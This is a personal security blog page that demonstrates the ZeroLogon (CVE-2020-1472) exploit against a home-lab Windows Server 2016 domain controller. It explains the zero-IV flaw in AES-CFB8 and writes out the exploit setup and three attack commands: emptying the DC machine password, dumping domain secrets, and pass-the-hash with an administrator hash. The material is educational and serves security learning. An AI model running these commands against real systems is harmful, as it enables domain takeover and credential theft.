130n@calvinlai.com
  • About Calvin Lai (fkclai)
  • My Work
  • Cyber Security
    • Cyber Security Centre (CSC)
      • Why we need a CSC
      • CSC Team Structure: Roles, Functions, and Tools
        • Key Function & Role
        • Tools & Platforms
        • People
        • Outsource Strategy
      • HRMC Executive Paper
  • Detection and Response
    • Playbook: Threat Prioritization & Automated Response Strategies
      • Scenario: Detecting and Mitigating a Ransomware Attack
      • Scenario: DC Sync Attack Detected and Mitigated
      • Scenario: Pass-the-Hash (PtH) Attack Detected and Contained
      • Scenario: Phishing Campaign with Malware / Credential Theft Detected and Mitigated
  • Application Architecture
    • Comparison of MVC , N-tier and Microservice Architecture
  • Application Security
    • OAuth, SAML, and OpenID Connect: Key Differences and Use Cases
    • Secure Coding Principles
    • HTTP Header Security Principles
    • Mitigating Broken Object Level Authorization (BOLA)
    • Spring Boot Validation
    • Output Encoding in JavaServer Faces (JSF)
    • Session Management Security Issues
    • Common API Security Problems
      • Broken Authentication
      • Excessive Data Exposure
      • Lack of Resources & Rate Limiting
      • Broken Function Level Authorization
      • Unsafe Consumption of APIs
    • JAVA Exception Handling
    • File Upload Validation
    • OAuth 2.0 Security
      • Insecure Storage of Access Tokens
    • Microservice Security
      • Sample Coding Demo
        • Service Implementation
        • Client Interaction
      • Security Solution for Microservices Architecture
    • Modifying and Protecting Java Class Files
      • Modify a Class File Inside a WAR File
      • Direct Bytecode Editing
        • Steps to Directly Edit a Java Class File
          • Update: Java Bytecode Editing Tools
      • Techniques to Protect Java Class Files
        • Runtime Decryption in WebLogic
    • JAVA Program
      • Secure, Concurrent Web Access Using Java and Tor
      • Creating a Maven Java project in Visual Studio Code
  • Exploit/CVE PoC
    • ZeroLogon Exploit
    • Remote Retrieved Chrome saved Encrypted Password
    • Twitter Control an RCE attack
  • Hacking Report (HTB)
    • Hits & Summary
      • Tools & Cheat Sheet
    • Windows Machine
      • Love 10.10.10.239
      • Blackfield 10.10.10.192
      • Remote 10.10.10.180
      • Sauna 10.10.10.175
      • Forest 10.10.10.161
      • Sniper
      • Json
      • Heist
      • Blue
      • Legacy
      • Resolute
      • Cascade
    • Linux Machine
      • Photobomb 10.10.11.182
      • Pandora 10.10.11.136
      • BountyHunter 10.10.11.100
      • CAP 10.10.10.245
      • Spectra 10.10.10.229
      • Ready 10.10.10.220
      • Doctor 10.10.10.209
      • Bucket 10.10.10.212
      • Blunder 10.10.10.191
      • Registry 10.10.10.159
      • Magic
      • Tabby
  • Penetration Testing
    • Web Application PenTest
    • Network/System PenTest
    • Mobile Penetration Test
      • Certificate Pinning
        • Certificate Pinning Bypass (Android)
          • Root a Android Device
          • Setup Proxy Tool - Burp Suite
      • Checklist
  • Threat Intelligence
    • Advanced Persistent Threat (APT) groups
      • North Korean APT Groups
      • Chinese APT Groups
      • Russian APT Groups
      • Other APT
  • Red Team (Windows)
    • 01 Reconnaissance
    • 02 Privileges Escalation
    • 03 Lateral Movement
    • 04 AD Attacks
      • DCSync
    • 05 Bypass-Evasion
    • 06 Kerberos Attack
    • 99 Basic Command
  • Exploitation Guide
    • 01 Reconnaissance
    • 02 Port Enumeration
    • 03 Web Enumeration
    • 04 Windows Enum & Exploit
      • Windows Credential Dumping
        • Credential Dumping: SAM
        • Credential Dumping: DCSync
      • Kerberos Attack
      • RDP
    • 05 File Enumeration
    • 06 Reverse Shell Cheat Sheet
      • Windows Reverse Shell
      • Linux Reverse Shell
    • 07 SQL Injection
    • 08 BruteForce
    • 09 XSS Bypass Checklist
    • 10 Spring Boot
    • 11 WPA
    • 12 Payload list
  • Vuln Hub (Writeup)
    • MrRobot
    • CYBERRY
    • MATRIX 1
    • Node-1
    • DPwwn-1
    • DC7
    • AiWeb-2
    • AiWeb-1
    • BrainPan
  • CTF (Writeup & Tips)
    • CTF Tools & Tips
    • Hacker One
    • CTF Learn
    • P.W.N. University - CTF 2018
    • HITCON
    • Pwnable
      • 01 Start
  • Useful Command/Tools
    • Kali
    • Windows
    • Linux
  • Offensive Security Lab & Exam
    • Lab
    • Tools for an Offensive Certification
      • Strategy for an Offensive Exam Certification
        • CVEs
        • Privilege Escalation
        • Commands
        • Impacket
  • ISO 27001
    • Disclaimer
    • What is ISO 27001
      • Implementation
    • Documentation
    • Common Mistake
    • Q&A
      • Can internal audit to replace the risk assessment
      • Is it sufficient for only the IT department head to support the ISO 27001 program
      • Does the Business Continuity Plan (BCP) and a Disaster Recovery Plan (DRP) are the same?
    • ISO 27001 Controls and Domains
      • 1. Information Security Policies
      • 2. Organization of Information Security
      • 3. Human Resource Security
      • 4. Asset Management
      • 5. Access Control
      • 6. Cryptographic Controls
      • 7. Physical and Environmental Security
      • 8: Operational Security
      • 9. Communications Security
      • 10. System Acquisition, Development, and Maintenance
      • 11. Supplier Relationships
      • 12: Information Security Incident Management
      • 13. Information Security Aspects of Business Continuity Management
      • 14. Compliance
Powered by GitBook
On this page
  • Introduction
  • Exploitation Demo
  • Target Environment
  • Tools Setup
  • Start Exploit
  • mimikatz Coding

Was this helpful?

  1. Exploit/CVE PoC

ZeroLogon Exploit

CVE-2020-1472, 6 Oct 2020

PreviousCreating a Maven Java project in Visual Studio CodeNextRemote Retrieved Chrome saved Encrypted Password

Last updated 6 months ago

Was this helpful?

Introduction

, a privilege elevation vulnerability in the Netlogon Remote Protocol (MS-NRPC) which Microsoft released a () fixed in August 2020. This vulnerability was discovered by secure security researcher on 11 September 2020. A weakness point was found on the encryption Advanced Encryption Standard – Cipher Feed Back 8 bit , (AES-CFB8) that used at the MS-NRPC to encrypt the client credential with the "Client Challenge" during the third steps of MS-NRPC. ZeroLogon, affected all the windows servers that function as Active Directory domain controllers in enterprise networks.

The following diagram is the authentication handshake process of MS-NRPC, the attack happened on steps 3 on encrypting the client credential using the AES-CFB8.

Using the AES-CFB8 in MS-NRPC protocol has an issue with the Initialisation Vector (IV). The IV should be a random number, but MS-NRPC set a fixed IV of 16 bytes of zeros. Thus, if the client challenge set to all zeros, the probability of all zero encryption result is 1/256. It can easy to pass the step 4 validation. The attack details can be referenced to the by Tom Tervoor

Exploitation Demo

Target Environment

Host Name: FKCLAI-WIN2016 OS Name: Microsoft Windows Server 2016 Standard OS Version: 10.0.14393 N/A Build 14393 Domain: FKCLAI.local Logon Server: \\FKCLAI-WIN2016

Tools Setup

root@kclai:~/Documents/ctf/expoit# git clone https://github.com/risksense/zerologon.git
Cloning into 'zerologon'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 22 (delta 11), reused 18 (delta 7), pack-reused 0
Unpacking objects: 100% (22/22), done.
root@kclai:~/Documents/ctf/expoit# 

Remove all impacket scripts

root@kclai:~/Documents/ctf/expoit/zerologon# apt remove --purge impacket-scripts python3-impacket
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages were automatically installed and are no longer required:
  automater bdfproxy blindelephant couchdb creddump deblaze dh-python dnmap
  erlang17-asn1 erlang17-base erlang17-crypto erlang17-eunit erlang17-inets
  erlang17-mnesia erlang17-os-mon erlang17-public-key erlang17-runtime-tools
  erlang17-snmp erlang17-ssl erlang17-syntax-tools erlang17-tools erlang17-webtool
  erlang17-xmerl fimap findmyhash funkload gconf-service gconf2-common
  ghost-phisher gir1.2-clutter-gst-3.0 gir1.2-gtkclutter-1.0 gir1.2-mutter-2
  gir1.2-mutter-3 giskismet glusterfs-common gnome-theme-kali grabber
  guile-2.0-libs gvfs-bin hexorbase intersect irqbalance jad kali-desktop-common
  keimpx libacl1-dev libadns1 libarmadillo8 libasan4 libattr1-dev libavahi-gobject0
  libayatana-ido3-0.4-0 libbfio1 libbind9-160 libboost-atomic1.62.0
  libboost-chrono1.62.0 libboost-date-time1.62.0 libboost-filesystem1.62.0
  libboost-iostreams1.62.0 libboost-program-options1.67.0 libboost-random1.62.0
  libboost-serialization1.67.0 libboost-system1.62.0 libboost-test1.67.0

get the latest impacket from the https://github.com/SecureAuthCorp/impacket.git

root@kclai:~/Documents/ctf/tools/win# git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 18598, done.
remote: Total 18598 (delta 0), reused 0 (delta 0), pack-reused 18598
Receiving objects: 100% (18598/18598), 6.17 MiB | 1.62 MiB/s, done.
Resolving deltas: 100% (14169/14169), done.
root@kclai:~/Documents/ctf/tools/win/impacket# python setup.py install
running install
running bdist_egg
running egg_info
creating impacket.egg-info
writing requirements to impacket.egg-info/requires.txt
writing impacket.egg-info/PKG-INFO
writing top-level names to impacket.egg-info/top_level.txt
writing dependency_links to impacket.egg-info/dependency_links.txt
writing manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest template 'MANIFEST.in'
warning: no files found matching 'tests' under directory 'examples'
warning: no files found matching '*.txt' under directory 'examples'
writing manife
..
..
..
... dding ldapdomaindump 0.9.1 to easy-install.pth file

Using /usr/lib/python3/dist-packages
Searching for ldap3==2.5.1
Best match: ldap3 2.5.1
Adding ldap3 2.5.1 to easy-install.pth file

Using /usr/lib/python3/dist-packages
Searching for Flask==1.1.1
Best match: Flask 1.1.1
Adding Flask 1.1.1 to easy-install.pth file
Installing flask script to /usr/local/bin

Using /usr/lib/python3/dist-packages
Finished processing dependencies for impacket==0.9.22.dev1+20200929.152157.fe642b24
root@kclai:~/Documents/ctf/tools/win/impacket# 

Start Exploit

python3 set_empty_pw.py fkclai-win2016 192.168.1.169

secretsdump.py -just-dc administrator/fkclai-win2016\$@192.168.1.169

wmiexec.py fkclai/administrator@192.168.1.169 -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

Many PoC exploits have been released (, , , , , ... etc)

Using the 's ZeroLogon exploitation script with the latest updated of the on this demo.

mimikatz

1
2
3
4
5
RiskSense
impacket
Coding
CVE-2020-1472
patch
KB4565349
Tom Tervoor
Whitepaper